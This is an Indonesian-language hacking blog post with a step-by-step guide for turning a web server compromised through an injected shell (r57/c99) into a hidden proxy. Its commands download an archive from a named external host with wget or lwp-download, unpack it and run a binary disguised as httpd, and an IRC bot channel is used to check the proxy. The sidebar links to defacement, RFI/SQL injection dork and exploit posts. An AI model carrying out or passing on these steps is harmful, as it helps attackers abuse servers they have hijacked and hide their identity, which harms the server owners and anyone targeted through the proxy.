Mungkin kita sudah tidak asing lagi dengan yang nama nya proxy…. Kalo saya definisikan proxy adalah sebuah mirror yang penggunaannya ditujukan untuk sebuah private yang berguna untuk menyamarkan ip address kita. Kali ini akan dijelaskan sedikit cara membuat proxy melalui shell dari sebuah web hasil injectkan.
Aku anggap kamu sudah bisa inject shell and let’s go to begin..
* masuk ke shell yang kita inject
* cari direktori yang memberikan permission 777 dengan command “find / -perm 777 -type d” jika ga ada, langsung aja menuju direktori /tmp
* wget file proxynya . commandnya “wget url/file” contoh: “wget http://3xploit.110mb.com/proxy.tgz” jika ga berhasil, coba pake command lwp-download atau fetch tapi dengan url yang lengkap, contoh commandnya “lwp-download http://3xploit.110mb.com/proxy.tgz”
* kalo tidak bisa juga, pakailah script injectkan r57 ato c99 sehingga ada fitur untuk uploadnya. dan uploadlah file proxy.tgz dengan fitur tersebut. jika belum punya filenya, donlot saja secara manual di http://3xploit.110mb.com/proxy.tgz dan kemudian di upload.
* extract filenya dengan command “tar -zxvf proxy.tgz”
* setelah diextract, masuk ke direktori pro dengan command “cd pro”
* eksekusi file xh, commandnya adalah “ ./xh -s ./httpd ./prox -a -d -p5050”
* cek hidup atau tidaknya proxy kamu di IRC channel yang terdapat bot untuk cek ip. contohnya adalah #kill-9 @irc.indonesiancoder.us
* command untuk ceknya biasanya bervariasi. tapi kurang lebih seperti ini “.port ip 5050” contohnya”.port 122.168.9.70 5050”
Ket:
* Deafult port diatas adalah 5050 dan dapat di edit pada sesuai keinginan kita pada “menu.conf”
* Ini adalah tutor untuk pembuatan proxy pada web hasil inject
* Tutor ini hanya berjalan pada mesin Linux ato keluarga UNIX
* Semua command di atas tanpa tanda petik dua (”)
Pencarian
Blog Archive
-
▼
2009
(52)
-
▼
December
(52)
- 140 Amazing Hacks For your PC
- Ultra Hacker 155 in 1
- Full Hack Pack 2009 [Exclusive]
- Wifi Hacks 2009 AIO
- Wireless Hack Toolz 2009
- Dangerous Hack Tool 2010
- KingCripts Hacking Pack
- ESET Nod32 Keys Finder V7
- A.I.O USB Utilities Tools
- Hacking Tools - 85 in 1
- Metasploit Framework
- Network Spy 2.0
- "UU ITE Bermasalah di Penerapan"
- Tifatul: UU ITE Miliki Beberapa Kejanggalan
- Tutorial LAN Hacking (Newbie)
- Nessus
- Linux sock_sendpage
- Linux kernel 2.4/2.6
- Kernel 2.6.17
- Bug&dork New
- Meffy Scanner
- Albania Scanner
- Defacing malaysuck site
- Defacing malaysian site
- Rose Scanner
- About | MIRC
- Make Proxy From Shell
- Rafly Scanner
- Pittbull Scanner
- SQL Injection Attacks by Example
- Bug Dork PHPBB
- Bug Dork WordPress
- Bajo Sanner
- HACK WIFI
- Joomla Bugs
- Remote File Include (RFI)
- Hacker
- Zell Scanner
- Install Eggdrop
- Alb Scanner
- Italian Scanner
- The Best Hack Tools Collection Ever
- Feelcomz Scanner
- Defacing Indonesian Site
- Mamboleto Joomla! component Remote File Include Vu...
- Old Bug&Dork
- Old Bug-Dork
- Joomla Component com_jphoto SQL injection vulnerab...
- Bug&Dork
- Joomla Component MojoBlog Multiple Remote File Inc...
- Joomla Component com_jsjobs Multiple SQL injection
- Bug-Dork
-
▼
December
(52)
Labels
- Article (17)
- bug dork lfi (5)
- bug dork list (5)
- bug dork rfi (5)
- bug dork sql (5)
- bug dork timthumb (5)
- bug dork xml (5)
- Dork RFI (8)
- Exploit (5)
- Hacking Tools (52)
- Kill-9 News (14)
- lfi bug dork (5)
- Lfi Dork (3)
- LFI Scanner (5)
- Linux-Kernel (17)
- list bug (5)
- list bug dork (5)
- rfi bug dork (5)
- Rfi Scanner (17)
- SQLi (15)
- tutorial (36)
Statistic User
Subscribe to:
Post Comments (Atom)
0 comments:
Post a Comment